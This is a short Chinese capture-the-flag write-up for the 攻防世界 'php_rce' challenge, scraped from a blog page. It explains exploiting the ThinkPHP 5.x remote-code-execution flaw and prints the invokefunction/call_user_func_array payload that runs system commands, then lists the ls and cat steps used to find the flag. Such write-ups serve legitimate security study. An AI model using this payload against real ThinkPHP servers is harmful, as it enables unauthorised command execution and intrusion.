当前位置: 首页 > news >正文

攻防世界-php_rce

原题

解题思路

        thinkPHP.0有漏洞,ThinkPHP5.x rec 漏洞分析与复现。本题就是利用漏洞查找。格式是:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令。

        ls查看文件没什么东西,robots.txt和index.php有可能有,不过看了也没什么可疑的。

        一直往上级目录查看三次才找到flag

        使用cat命令查看flag文件

http://www.lryc.cn/news/155824.html

相关文章:

  • 最小生成树Kruskal、Prim算法C++
  • 系统架构设计师-计算机系统基础知识(2)
  • 二叉树的介绍
  • 数据结构与算法复杂度介绍
  • CentOS 安装蒲公英
  • 英语语法基础--思维导图
  • Android泛型详解
  • C++信息学奥赛1178:成绩排序
  • 【计算机视觉 | 目标检测】目标检测常用数据集及其介绍(七)
  • 100天精通Golang(基础入门篇)——第20天:Golang 接口 深度解析☞从基础到高级
  • ESXi 6.7添加螃蟹2.5g网卡支持
  • 机器学习笔记之最优化理论与方法(四) 凸函数:定义与基本性质
  • 【Git】git tag 查看版本号 | 删除本地 | 删除远程仓库| 批量删除
  • thinkphp:数据库查询,嵌套别的表的查询(别的表做子查询)
  • 《Linux 系统命令及Shell脚本实践指南》
  • 代码随想录算法训练营第三十八天 | ● 理论基础 ● 509. 斐波那契数 ● 70. 爬楼梯 ● 746. 使用最小花费爬楼梯
  • Java分别用BIO、NIO实现简单的客户端服务器通信
  • React Portals
  • Python基础之高级函数
  • CSS3常用的新功能总结
  • Lvs+KeepAlived高可用高性能负载均衡
  • 无涯教程-Android Online Test函数
  • 蓝桥杯打卡Day1
  • zipkin2.24.2源码install遇见的问题
  • yapi密码是如何生成的
  • 2023-09-02 LeetCode每日一题(最多可以摧毁的敌人城堡数目)
  • k8s环境部署配置
  • Java之文件操作与IO
  • 指令系统(408)
  • Pygame中Trivia游戏解析6-3